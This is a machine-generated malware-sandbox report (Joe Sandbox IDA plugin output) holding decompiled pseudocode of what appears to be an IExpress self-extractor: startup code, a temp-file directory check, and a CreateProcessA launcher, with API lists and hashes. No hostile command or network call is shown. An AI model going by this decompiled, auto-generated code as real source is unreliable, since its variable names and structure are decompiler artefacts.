                                                                                                                                                                                                                                              						_t53 = 1;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L7:
                                                                                                                                                                                                                                              					_t67 =  *0xa888b0 - _t58; // 0x2
                                                                                                                                                                                                                                              					if(_t67 != 0) {
                                                                                                                                                                                                                                              						__eflags =  *0xa888b0; // 0x2
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							 *0xa881e4 = _t58;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0xa888b0 = _t58;
                                                                                                                                                                                                                                              							_t37 = E00A86C3F(0xa810b8, 0xa810c4); // executed
                                                                                                                                                                                                                                              							__eflags = _t37;
                                                                                                                                                                                                                                              							if(__eflags == 0) {
                                                                                                                                                                                                                                              								goto L13;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              								_t30 = 0xff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						_push(0x1f);
                                                                                                                                                                                                                                              						L00A86FF4();
                                                                                                                                                                                                                                              						L13:
                                                                                                                                                                                                                                              						_t68 =  *0xa888b0 - _t58; // 0x2
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_push(0xa810b4);
                                                                                                                                                                                                                                              							_push(0xa810ac);
                                                                                                                                                                                                                                              							L00A87202();
                                                                                                                                                                                                                                              							 *0xa888b0 = 2;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(_t53 == 0) {
                                                                                                                                                                                                                                              							 *0xa888ac = 0;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t71 =  *0xa888b4;
                                                                                                                                                                                                                                              						if( *0xa888b4 != 0 && E00A87060(_t71, 0xa888b4) != 0) {
                                                                                                                                                                                                                                              							_t60 =  *0xa888b4; // 0x0
                                                                                                                                                                                                                                              							 *0xa8a288(0, 2, 0);
                                                                                                                                                                                                                                              							 *_t60();
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                                                              						_t59 =  *_t25;
                                                                                                                                                                                                                                              						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                                                              						while(1) {
                                                                                                                                                                                                                                              							_t41 =  *_t59;
                                                                                                                                                                                                                                              							if(_t41 > 0x20) {
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							if(_t41 != 0) {
                                                                                                                                                                                                                                              								if(_t54 != 0) {
                                                                                                                                                                                                                                              									goto L32;
                                                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                                                              									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                                                              										_t59 = _t59 + 1;
                                                                                                                                                                                                                                              										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              										_t41 =  *_t59;
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                                                              							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                                                              								_t29 = 0xa;
                                                                                                                                                                                                                                              							} else {
                                                                                                                                                                                                                                              								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_push(_t29);
                                                                                                                                                                                                                                              							_t30 = E00A82BFB(0xa80000, 0, _t59); // executed
                                                                                                                                                                                                                                              							 *0xa881e0 = _t30;
                                                                                                                                                                                                                                              							__eflags =  *0xa881f8;
                                                                                                                                                                                                                                              							if( *0xa881f8 == 0) {
                                                                                                                                                                                                                                              								exit(_t30); // executed
                                                                                                                                                                                                                                              								goto L32;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							__eflags =  *0xa881e4;
                                                                                                                                                                                                                                              							if( *0xa881e4 == 0) {
                                                                                                                                                                                                                                              								__imp___cexit();
                                                                                                                                                                                                                                              								_t30 =  *0xa881e0; // 0x0
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                              							goto L40;
                                                                                                                                                                                                                                              							L32:
                                                                                                                                                                                                                                              							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                              							if(_t41 == 0x22) {
                                                                                                                                                                                                                                              								__eflags = _t54;
                                                                                                                                                                                                                                              								_t15 = _t54 == 0;
                                                                                                                                                                                                                                              								__eflags = _t15;
                                                                                                                                                                                                                                              								_t54 = 0 | _t15;
                                                                                                                                                                                                                                              								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                              							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                              							__eflags = _t26;
                                                                                                                                                                                                                                              							if(_t26 != 0) {
                                                                                                                                                                                                                                              								_t59 = _t59 + 1;
                                                                                                                                                                                                                                              								__eflags = _t59;
                                                                                                                                                                                                                                              								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t59 = _t59 + 1;
                                                                                                                                                                                                                                              							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					L40:
                                                                                                                                                                                                                                              					return E00A8724D(_t30);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t58 = 1;
                                                                                                                                                                                                                                              				__eflags = 1;
                                                                                                                                                                                                                                              				goto L7;
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a86a60
                                                                                                                                                                                                                                              0x00a86a6a
                                                                                                                                                                                                                                              0x00a86a6c
                                                                                                                                                                                                                                              0x00a86a71
                                                                                                                                                                                                                                              0x00a86a78
                                                                                                                                                                                                                                              0x00a86a7f
                                                                                                                                                                                                                                              0x00a86a85
                                                                                                                                                                                                                                              0x00a86a8e
                                                                                                                                                                                                                                              0x00a86a91
                                                                                                                                                                                                                                              0x00a86a93
                                                                                                                                                                                                                                              0x00a86a9c
                                                                                                                                                                                                                                              0x00a86aa2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86aa6
                                                                                                                                                                                                                                              0x00a86ab4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86aa8
                                                                                                                                                                                                                                              0x00a86aaa
                                                                                                                                                                                                                                              0x00a86aab
                                                                                                                                                                                                                                              0x00a86aab
                                                                                                                                                                                                                                              0x00a86abf
                                                                                                                                                                                                                                              0x00a86abf
                                                                                                                                                                                                                                              0x00a86ac5
                                                                                                                                                                                                                                              0x00a86ad1
                                                                                                                                                                                                                                              0x00a86ad7
                                                                                                                                                                                                                                              0x00a86b05
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86ad9
                                                                                                                                                                                                                                              0x00a86ad9
                                                                                                                                                                                                                                              0x00a86ae9
                                                                                                                                                                                                                                              0x00a86af0
                                                                                                                                                                                                                                              0x00a86af2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86af4
                                                                                                                                                                                                                                              0x00a86af4
                                                                                                                                                                                                                                              0x00a86afb
                                                                                                                                                                                                                                              0x00a86afb
                                                                                                                                                                                                                                              0x00a86af2
                                                                                                                                                                                                                                              0x00a86ac7
                                                                                                                                                                                                                                              0x00a86ac7
                                                                                                                                                                                                                                              0x00a86ac9
                                                                                                                                                                                                                                              0x00a86b0b
                                                                                                                                                                                                                                              0x00a86b0b
                                                                                                                                                                                                                                              0x00a86b11
                                                                                                                                                                                                                                              0x00a86b13
                                                                                                                                                                                                                                              0x00a86b18
                                                                                                                                                                                                                                              0x00a86b1d
                                                                                                                                                                                                                                              0x00a86b24
                                                                                                                                                                                                                                              0x00a86b24
                                                                                                                                                                                                                                              0x00a86b30
                                                                                                                                                                                                                                              0x00a86b39
                                                                                                                                                                                                                                              0x00a86b39
                                                                                                                                                                                                                                              0x00a86b3b
                                                                                                                                                                                                                                              0x00a86b42
                                                                                                                                                                                                                                              0x00a86b57
                                                                                                                                                                                                                                              0x00a86b5f
                                                                                                                                                                                                                                              0x00a86b65
                                                                                                                                                                                                                                              0x00a86b65
                                                                                                                                                                                                                                              0x00a86b67
                                                                                                                                                                                                                                              0x00a86b6c
                                                                                                                                                                                                                                              0x00a86b6e
                                                                                                                                                                                                                                              0x00a86b71
                                                                                                                                                                                                                                              0x00a86b74
                                                                                                                                                                                                                                              0x00a86b74
                                                                                                                                                                                                                                              0x00a86b79
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86b7d
                                                                                                                                                                                                                                              0x00a86b81
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86b83
                                                                                                                                                                                                                                              0x00a86b8c
                                                                                                                                                                                                                                              0x00a86b8d
                                                                                                                                                                                                                                              0x00a86b90
                                                                                                                                                                                                                                              0x00a86b90
                                                                                                                                                                                                                                              0x00a86b83
                                                                                                                                                                                                                                              0x00a86b81
                                                                                                                                                                                                                                              0x00a86b94
                                                                                                                                                                                                                                              0x00a86b98
                                                                                                                                                                                                                                              0x00a86ba2
                                                                                                                                                                                                                                              0x00a86b9a
                                                                                                                                                                                                                                              0x00a86b9a
                                                                                                                                                                                                                                              0x00a86b9a
                                                                                                                                                                                                                                              0x00a86ba3
                                                                                                                                                                                                                                              0x00a86bab
                                                                                                                                                                                                                                              0x00a86bb0
                                                                                                                                                                                                                                              0x00a86bb5
                                                                                                                                                                                                                                              0x00a86bbc
                                                                                                                                                                                                                                              0x00a86bbf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86bbf
                                                                                                                                                                                                                                              0x00a86c1e
                                                                                                                                                                                                                                              0x00a86c25
                                                                                                                                                                                                                                              0x00a86c27
                                                                                                                                                                                                                                              0x00a86c2d
                                                                                                                                                                                                                                              0x00a86c2d
                                                                                                                                                                                                                                              0x00a86c32
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a86bc5
                                                                                                                                                                                                                                              0x00a86bc5
                                                                                                                                                                                                                                              0x00a86bc8
                                                                                                                                                                                                                                              0x00a86bcc
                                                                                                                                                                                                                                              0x00a86bce
                                                                                                                                                                                                                                              0x00a86bce
                                                                                                                                                                                                                                              0x00a86bd1
                                                                                                                                                                                                                                              0x00a86bd3
                                                                                                                                                                                                                                              0x00a86bd3
                                                                                                                                                                                                                                              0x00a86bd6
                                                                                                                                                                                                                                              0x00a86bda
                                                                                                                                                                                                                                              0x00a86be1
                                                                                                                                                                                                                                              0x00a86be3
                                                                                                                                                                                                                                              0x00a86be5
                                                                                                                                                                                                                                              0x00a86be5
                                                                                                                                                                                                                                              0x00a86be6
                                                                                                                                                                                                                                              0x00a86be6
                                                                                                                                                                                                                                              0x00a86be9
                                                                                                                                                                                                                                              0x00a86bea
                                                                                                                                                                                                                                              0x00a86bea
                                                                                                                                                                                                                                              0x00a86b74
                                                                                                                                                                                                                                              0x00a86c39
                                                                                                                                                                                                                                              0x00a86c3e
                                                                                                                                                                                                                                              0x00a86c3e
                                                                                                                                                                                                                                              0x00a86abe
                                                                                                                                                                                                                                              0x00a86abe
                                                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A87182
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetCurrentProcessId.KERNEL32 ref: 00A87191
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetCurrentThreadId.KERNEL32 ref: 00A8719A
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: GetTickCount.KERNEL32 ref: 00A871A3
                                                                                                                                                                                                                                                • Part of subcall function 00A87155: QueryPerformanceCounter.KERNEL32(?), ref: 00A871B8
                                                                                                                                                                                                                                              • GetStartupInfoW.KERNEL32(?,00A872B8,00000058), ref: 00A86A7F
                                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 00A86AB4
                                                                                                                                                                                                                                              • _amsg_exit.MSVCRT ref: 00A86AC9
                                                                                                                                                                                                                                              • _initterm.MSVCRT ref: 00A86B1D
                                                                                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00A86B49
                                                                                                                                                                                                                                              • exit.KERNELBASE ref: 00A86BBF
                                                                                                                                                                                                                                              • _ismbblead.MSVCRT ref: 00A86BDA
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 836923961-0
                                                                                                                                                                                                                                              • Opcode ID: 4e6ee430b50bdd0aaa982cfed7940a2fc7760014be33c56c63f5506919998867
                                                                                                                                                                                                                                              • Instruction ID: 2fa7c6c9fad436d6bef3e96bbfd1187be1fe74d142075cc7546c2088829e2942
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e6ee430b50bdd0aaa982cfed7940a2fc7760014be33c56c63f5506919998867
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D41D2719843249FFB21FBA4DD497AA77F4FB44764F64412AE841E7290DF7888428B81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 587 a858c8-a858d5 588 a858d8-a858dd 587->588 588->588 589 a858df-a858f1 LocalAlloc 588->589 590 a85919-a85959 call a81680 call a8658a CreateFileA LocalFree 589->590 591 a858f3-a85901 call a844b9 589->591 594 a85906-a85910 call a86285 590->594 601 a8595b-a8596c CloseHandle GetFileAttributesA 590->601 591->594 600 a85912-a85918 594->600 601->594 602 a8596e-a85970 601->602 602->594 603 a85972-a8597b 602->603 603->600
                                                                                                                                                                                                                                              C-Code - Quality: 95%
                                                                                                                                                                                                                                              			E00A858C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				intOrPtr _t6;
                                                                                                                                                                                                                                              				void* _t10;
                                                                                                                                                                                                                                              				void* _t12;
                                                                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                                                                              				signed char _t16;
                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E00A81680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E00A8658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0xa89124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              0x00a858cd
                                                                                                                                                                                                                                              0x00a858d1
                                                                                                                                                                                                                                              0x00a858d3
                                                                                                                                                                                                                                              0x00a858d5
                                                                                                                                                                                                                                              0x00a858d8
                                                                                                                                                                                                                                              0x00a858d8
                                                                                                                                                                                                                                              0x00a858da
                                                                                                                                                                                                                                              0x00a858db
                                                                                                                                                                                                                                              0x00a858e1
                                                                                                                                                                                                                                              0x00a858ed
                                                                                                                                                                                                                                              0x00a858f1
                                                                                                                                                                                                                                              0x00a8591e
                                                                                                                                                                                                                                              0x00a8592c
                                                                                                                                                                                                                                              0x00a85943
                                                                                                                                                                                                                                              0x00a8594a
                                                                                                                                                                                                                                              0x00a8594d
                                                                                                                                                                                                                                              0x00a85953
                                                                                                                                                                                                                                              0x00a85959
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a8595b
                                                                                                                                                                                                                                              0x00a8595c
                                                                                                                                                                                                                                              0x00a85963
                                                                                                                                                                                                                                              0x00a8596c
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a85972
                                                                                                                                                                                                                                              0x00a85974
                                                                                                                                                                                                                                              0x00a8597a
                                                                                                                                                                                                                                              0x00a8597a
                                                                                                                                                                                                                                              0x00a8596c
                                                                                                                                                                                                                                              0x00a858f3
                                                                                                                                                                                                                                              0x00a85901
                                                                                                                                                                                                                                              0x00a85906
                                                                                                                                                                                                                                              0x00a8590b
                                                                                                                                                                                                                                              0x00a85910
                                                                                                                                                                                                                                              0x00a85910
                                                                                                                                                                                                                                              0x00a85918

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A858E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A8595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00A85534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00A85963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.406290316.0000000000A81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406258413.0000000000A80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406326237.0000000000A88000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.406345192.0000000000A8C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_a80000_fDI32WO.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-394614654
                                                                                                                                                                                                                                              • Opcode ID: f83e9eaa383f00d5c1f7280ee59cb1b8c8000b8caa3a05c794947c74530d585d
                                                                                                                                                                                                                                              • Instruction ID: 6f8270a067e115a13eed6e262c72e769384aa7ffb8ff66855d5c9f6f2bdf643a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f83e9eaa383f00d5c1f7280ee59cb1b8c8000b8caa3a05c794947c74530d585d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F110871E0021067D724BFF95C4DB9B7E9DDF45760F100616F945D31D1DB74980687A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 631 a83fef-a84010 632 a8410a-a8411a call a86ce0 631->632 633 a84016-a8403b CreateProcessA 631->633 634 a84041-a8406e WaitForSingleObject GetExitCodeProcess 633->634 635 a840c4-a84101 call a86285 GetLastError FormatMessageA call a844b9 633->635 638 a84070-a84077 634->638 639 a84091 call a8411b 634->639 647 a84106 635->647 638->639 642 a84079-a8407b 638->642 646 a84096-a840b8 CloseHandle * 2 639->646 642->639 645 a8407d-a84089 642->645 645->639 648 a8408b 645->648 649 a84108 646->649 650 a840ba-a840c0 646->650 647->649 648->639 649->632 650->649 651 a840c2 650->651 651->647
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E00A83FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0xa88004; // 0xd891196d
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E00A86CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0xa89124 = E00A86285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E00A844B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0xa88a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0xa89a2c; // 0x0
                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0xa89a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E00A8411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0xa89a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}


















                                                                                                                                                                                                                                              0x00a83fef
                                                                                                                                                                                                                                              0x00a83ffa
                                                                                                                                                                                                                                              0x00a84001
                                                                                                                                                                                                                                              0x00a84008
                                                                                                                                                                                                                                              0x00a8400a
                                                                                                                                                                                                                                              0x00a8400b
                                                                                                                                                                                                                                              0x00a84010
                                                                                                                                                                                                                                              0x00a8410a
                                                                                                                                                                                                                                              0x00a8411a
                                                                                                                                                                                                                                              0x00a8411a
                                                                                                                                                                                                                                              0x00a8401c
                                                                                                                                                                                                                                              0x00a8401d
                                                                                                                                                                                                                                              0x00a8401e
                                                                                                                                                                                                                                              0x00a8401f
                                                                                                                                                                                                                                              0x00a84033
                                                                                                                                                                                                                                              0x00a8403b
                                                                                                                                                                                                                                              0x00a840ca
                                                                                                                                                                                                                                              0x00a840e9
                                                                                                                                                                                                                                              0x00a840f8
                                                                                                                                                                                                                                              0x00a84101
                                                                                                                                                                                                                                              0x00a84106
                                                                                                                                                                                                                                              0x00a84106
                                                                                                                                                                                                                                              0x00a84108
                                                                                                                                                                                                                                              0x00a84108
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00a84108
                                                                                                                                                                                                                                              0x00a84049
                                                                                                                                                                                                                                              0x00a8405c
                                                                                                                                                                                                                                              0x00a84062
                                                                                                                                                                                                                                              0x00a84068
                                                                                                                                                                                                                                              0x00a8406e
                                                                                                                                                                                                                                              0x00a84070
                                                                                                                                                                                                                                              0x00a84077
                                                                                                                                                                                                                                              0x00a8407f
                                                                                                                                                                                                                                              0x00a84089
                                                                                                                                                                                                                                              0x00a8408b
                                                                                                                                                                                                                                              0x00a8408b
                                                                                                                                                                                                                                              0x00a84089
                                                                                                                                                                                                                                              0x00a84077
